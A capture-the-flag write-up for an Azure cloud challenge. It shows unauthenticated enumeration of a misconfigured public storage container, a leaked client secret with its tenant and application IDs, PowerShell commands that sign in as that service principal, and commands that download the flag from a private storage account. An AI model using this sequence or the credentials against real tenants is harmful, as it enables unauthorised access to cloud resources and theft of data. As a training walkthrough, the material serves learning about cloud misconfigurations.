Description

Today in school, I learnt to code in HTML! View my brand new website! www.lncctf2023.tk Hint 1: Identify how the website is hosted using what services

Hint 2: Enumerate your role and the allowed actions

Viewing the website, we can identify that it is hosted on some azure services

Since there isnt much information, other than the domain name, we can use MicroBurst to perform unauthenticated enumeration.

Refering to HackTricks

From the MicroBurst output, I have identified 2 files, /private/instructions.txt and /root/flag.txt

The /root/flag.txt shows a troll flag but /private/instructions.txt has some juicy information.

Note to self:

Credentials for accessing the tenant. 
Hopefully no one can see this...

Tenant ID: c11b22d2-d015-47e0-bc0b-e6a0b1e25993
Application ID: ee767510-7041-4930-a672-1217ff9ff51a
Client Secret: pnh8Q~g~.gDOjPHNDNSGq7dFBUkjEMQ1I5HJydaQ

Since I have a set of credentials, we are able to use Azure PowerShell module to login with the service principal

$appid="ee767510-7041-4930-a672-1217ff9ff51a"
$secret="pnh8Q~g~.gDOjPHNDNSGq7dFBUkjEMQ1I5HJydaQ"

$tid= 'c11b22d2-d015-47e0-bc0b-e6a0b1e25993'

$creds = (ConvertTo-SecureString $secret -AsPlainText -Force)
$creds = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $appid,$creds

Connect-AzAccount -ServicePrincipal -TenantId $tid -Credential $creds

Next, I can enumerate the resources our service principal has access to using Get-AzResource

I manage to identify that there is another storage account called lncctf2023private. I am then able to retrieve the flag from the private storage account

$rg="lncctf2023_cloudy_meatball_rg"
$saname="lncctf2023private"
$sa = Get-AzStorageAccount -ResourceGroupName $rg -StorageAccountName $saname
$ctx = $sa.Context

Get-AzStorageContainer -Context $ctx
Get-AzStorageBlob -Context $ctx -Container flag
Get-AzStorageBlobContent -Blob flag.txt -Container flag -Destination flag.txt -Context $ctx

Flag: LNC2023{aZuR3_pUbL1C_c0ntAiN3R_i3_n0T_s0_s3cuR3}